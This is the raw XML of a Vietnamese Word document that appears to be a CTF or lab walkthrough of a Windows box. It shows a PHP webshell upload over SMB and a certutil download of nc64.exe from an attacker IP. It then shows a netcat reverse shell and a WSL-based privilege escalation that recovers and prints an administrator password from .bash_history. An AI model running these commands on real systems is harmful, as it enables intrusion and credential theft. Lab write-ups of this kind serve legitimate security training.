      <w:r w:rsidR="00593B45">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ạn truy cập được web root của máy chủ 10.10.10.97:8808</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293BC89A" w14:textId="758B96AE" w:rsidR="00593B45" w:rsidRDefault="00593B45" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07209025" w14:textId="5D73222E" w:rsidR="00593B45" w:rsidRDefault="00F8549A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đang dùng ngôn ngữ php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D967A" w14:textId="2EA2BB36" w:rsidR="00576894" w:rsidRDefault="00576894" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F4C7E1" w14:textId="2B18EA23" w:rsidR="00576894" w:rsidRDefault="00F8549A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Tải php webshell lên smb share:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB098B" w14:textId="6F0A089D" w:rsidR="00180714" w:rsidRDefault="00180714" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF95742" w14:textId="1D1B3B43" w:rsidR="00180714" w:rsidRDefault="00180714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D18BC0" wp14:editId="3B934DC4">
            <wp:extent cx="5943600" cy="5003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D31C3" w14:textId="5FE582D4" w:rsidR="00180714" w:rsidRDefault="00180714" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D8EE10" w14:textId="48E42DA9" w:rsidR="00180714" w:rsidRDefault="00B4556F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E990F0" wp14:editId="766DB2AB">
            <wp:extent cx="5943600" cy="21450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8942B" w14:textId="68192569" w:rsidR="00A10956" w:rsidRDefault="00A10956" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BD2DA6" w14:textId="1AA76892" w:rsidR="00A10956" w:rsidRDefault="00A10956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D8E727" wp14:editId="29B4DDA2">
            <wp:extent cx="5943600" cy="14909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35EEA" w14:textId="0546DE46" w:rsidR="00A10956" w:rsidRDefault="00A10956" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F527C92" w14:textId="3883FEA5" w:rsidR="008A3647" w:rsidRDefault="00566CEC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Shell bạn đang chạy là iis apppool\new site, đặc quyền không cao. Mình sẽ tải lên webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACCCAA5" w14:textId="5D86F973" w:rsidR="00566CEC" w:rsidRDefault="00566CEC" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1CA4FE" w14:textId="2C36737B" w:rsidR="00566CEC" w:rsidRDefault="004E1594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9C134C" wp14:editId="50782529">
            <wp:extent cx="4466953" cy="1055914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89" t="16125" r="44869" b="67180"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4497254" cy="106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90A81" w14:textId="6EAE143E" w:rsidR="004E1594" w:rsidRDefault="00A31790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Tại sao lại là tyler? </w:t>
      </w:r>
      <w:r w:rsidRPr="00A31790">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B7148" w14:textId="14459A38" w:rsidR="00A31790" w:rsidRDefault="00A31790" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A2555C" w14:textId="2A442042" w:rsidR="00226B83" w:rsidRPr="00B1571E" w:rsidRDefault="00B1571E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1571E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certutil -urlcache -split -f http://10.10.14.7:9000/nc64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12964EFC" w14:textId="631BCDFD" w:rsidR="00B1571E" w:rsidRPr="00B1571E" w:rsidRDefault="00B1571E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1571E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc64.exe 10.10.14.7 1234 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA53E7" w14:textId="53319B76" w:rsidR="00B1571E" w:rsidRDefault="00B1571E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3125CFD7" w14:textId="2FAAE47C" w:rsidR="00B1571E" w:rsidRDefault="00B1571E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E22266" wp14:editId="1DADCD54">
            <wp:extent cx="3733800" cy="685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C4223" w14:textId="56D7D555" w:rsidR="00B1571E" w:rsidRDefault="00B1571E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D67D124" w14:textId="77777777" w:rsidR="000E7054" w:rsidRPr="00BF54D0" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF54D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF3762" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228C7442" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E70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Liệt kê C:\ thấy tập tin Ubuntu.zip và thư mục Distros\Ubuntu. Khả năng cao Windows Subsystem for Linux (WSL) đã được cài đặt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154D0A9" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD59E37" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7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2741E9B" wp14:editId="5BC6F25B">
            <wp:extent cx="4912922" cy="4299857"/>
            <wp:effectExtent l="0" t="0" r="254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3858" cy="431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6E02" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254039C1" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF45617" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E705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4C62EC" wp14:editId="5F7BFE14">
            <wp:extent cx="4916588" cy="1839686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265" cy="184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73F1" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E7054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6847B83E" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="000E705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kiểm tra WSL cài đặt chưa, chúng ta dùng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311FF818" w14:textId="77777777" w:rsidR="00B1571E" w:rsidRDefault="00B1571E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39015FFF" w14:textId="412AE836" w:rsidR="00226B83" w:rsidRDefault="00226B83" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246CEEC0" w14:textId="021013CB" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD416A2" w14:textId="77777777" w:rsidR="000E7054" w:rsidRDefault="000E7054" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F1303A" w14:textId="5D0207E6" w:rsidR="00B23AC4" w:rsidRPr="00E60678" w:rsidRDefault="00E60678" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E60678">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss | %{Get-ItemProperty $_.PSPath} | out-string -width 4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC1DB7" w14:textId="109DDD09" w:rsidR="00F4618C" w:rsidRDefault="00F4618C" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13355AD8" w14:textId="31F5E503" w:rsidR="00F4618C" w:rsidRDefault="00E60678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B07E7F4" wp14:editId="5CF19FEB">
            <wp:extent cx="594360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F717E" w14:textId="0591BA9B" w:rsidR="00E60678" w:rsidRDefault="00E60678" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B078E4" w14:textId="71F46F97" w:rsidR="00E60678" w:rsidRDefault="00B269A8" w:rsidP="00411D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Hệ thống tập tin Linux ở: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B269A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969EA51" w14:textId="7F4F0601" w:rsidR="00B269A8" w:rsidRDefault="00B269A8" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A659BD" w14:textId="3A0FEC3D" w:rsidR="00B269A8" w:rsidRDefault="009015B3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11247D" wp14:editId="0E38F4B1">
            <wp:extent cx="5943600" cy="8102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B402" w14:textId="20946E05" w:rsidR="009015B3" w:rsidRDefault="009015B3" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794D7F9E" w14:textId="189B3463" w:rsidR="009015B3" w:rsidRDefault="005C280D" w:rsidP="00411D3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EC44BF8" wp14:editId="51880E6F">
            <wp:extent cx="5943600" cy="12388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784F" w14:textId="3F5526F9" w:rsidR="002E162E" w:rsidRDefault="002E162E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C4E1BE" w14:textId="60EF0297" w:rsidR="002E162E" w:rsidRPr="00D22187" w:rsidRDefault="002E162E" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E162E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root\*</w:t>
      </w:r>
      <w:r w:rsidR="00D22187">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D22187" w:rsidRPr="00D22187">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Get-Content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD387C" w14:textId="072CCAB6" w:rsidR="00A16C02" w:rsidRDefault="00A16C02" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C695D8A" w14:textId="45DD1A2A" w:rsidR="00A16C02" w:rsidRDefault="007C212B" w:rsidP="00411D3D">
      <w:pPr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t>Mình kiểm tra .bash_history và khám phá được tài khoản administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E418557" w14:textId="42A52A67" w:rsidR="007C212B" w:rsidRDefault="007C212B" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55589C6A" w14:textId="059E68A0" w:rsidR="007C212B" w:rsidRDefault="00EF7D77" w:rsidP="00411D3D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786A177D" wp14:editId="36481019">
            <wp:extent cx="5943600" cy="2044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077ED" w14:textId="5DA5829B" w:rsidR="00EF7D77" w:rsidRDefault="00EF7D77" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A66D566" w14:textId="010A66F3" w:rsidR="00534795" w:rsidRPr="00534795" w:rsidRDefault="00CA057D" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534795">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator%u6!4ZwgwOM#^OBf#Nwnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356015A" w14:textId="057EB809" w:rsidR="00CA057D" w:rsidRDefault="00CA057D" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6966D8AE" w14:textId="071C30A1" w:rsidR="00CA057D" w:rsidRDefault="00534795" w:rsidP="00411D3D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3DF99537" wp14:editId="2AB51C46">
            <wp:extent cx="5435600" cy="3568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3461" w14:textId="212052CE" w:rsidR="00534795" w:rsidRDefault="00534795" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701577A8" w14:textId="6397FD74" w:rsidR="00534795" w:rsidRPr="00D22187" w:rsidRDefault="00D97020" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E33A55" wp14:editId="7257564A">
            <wp:extent cx="5943600" cy="4718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4795" w:rsidRPr="00D221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9435792"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDC7F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43196A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A38C3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40C6"/>
    <w:rsid w:val="00010C24"/>
    <w:rsid w:val="000E7054"/>
    <w:rsid w:val="0011303B"/>
    <w:rsid w:val="00180714"/>
    <w:rsid w:val="001B5D94"/>
    <w:rsid w:val="001C40C6"/>
    <w:rsid w:val="00226B83"/>
    <w:rsid w:val="00233918"/>
    <w:rsid w:val="00257D2E"/>
    <w:rsid w:val="002671F8"/>
    <w:rsid w:val="00271B35"/>
    <w:rsid w:val="002C3244"/>
    <w:rsid w:val="002E162E"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0039699E"/>
    <w:rsid w:val="003F0FD4"/>
    <w:rsid w:val="00411D3D"/>
    <w:rsid w:val="00417E98"/>
    <w:rsid w:val="00426298"/>
    <w:rsid w:val="00437496"/>
    <w:rsid w:val="00456217"/>
    <w:rsid w:val="004A4839"/>
    <w:rsid w:val="004E1594"/>
    <w:rsid w:val="004E512C"/>
    <w:rsid w:val="004F5FEE"/>
    <w:rsid w:val="00534795"/>
    <w:rsid w:val="00537773"/>
    <w:rsid w:val="00566CEC"/>
    <w:rsid w:val="00576894"/>
    <w:rsid w:val="00577D96"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00593B45"/>
    <w:rsid w:val="005B0E2D"/>
    <w:rsid w:val="005C280D"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="007416A2"/>
    <w:rsid w:val="007871C6"/>
    <w:rsid w:val="007C212B"/>
    <w:rsid w:val="008A3647"/>
    <w:rsid w:val="009015B3"/>
    <w:rsid w:val="00927EB1"/>
    <w:rsid w:val="009417E3"/>
    <w:rsid w:val="009C6FD8"/>
    <w:rsid w:val="00A10956"/>
    <w:rsid w:val="00A16C02"/>
    <w:rsid w:val="00A20C7E"/>
    <w:rsid w:val="00A31790"/>
    <w:rsid w:val="00A70BEA"/>
    <w:rsid w:val="00B123BE"/>
    <w:rsid w:val="00B1571E"/>
    <w:rsid w:val="00B23AC4"/>
    <w:rsid w:val="00B269A8"/>
    <w:rsid w:val="00B4556F"/>
    <w:rsid w:val="00B917F0"/>
    <w:rsid w:val="00BA7C19"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE01E8"/>
    <w:rsid w:val="00BF54D0"/>
    <w:rsid w:val="00C37B5A"/>
    <w:rsid w:val="00C40D85"/>
    <w:rsid w:val="00CA057D"/>
    <w:rsid w:val="00CA1E8C"/>
    <w:rsid w:val="00CD4B34"/>
    <w:rsid w:val="00CE0660"/>
    <w:rsid w:val="00CE1583"/>
    <w:rsid w:val="00CF62BD"/>
    <w:rsid w:val="00D22187"/>
    <w:rsid w:val="00D97020"/>
    <w:rsid w:val="00DA35D6"/>
    <w:rsid w:val="00E60678"/>
    <w:rsid w:val="00EB5DF1"/>
    <w:rsid w:val="00EF7D77"/>
    <w:rsid w:val="00F4618C"/>
    <w:rsid w:val="00F85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463F16"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FD606666-2C4F-3442-AE4F-0F5D4E05D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1B5D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389</Words>
  <Characters>2218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64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-22T02:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-22T17:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>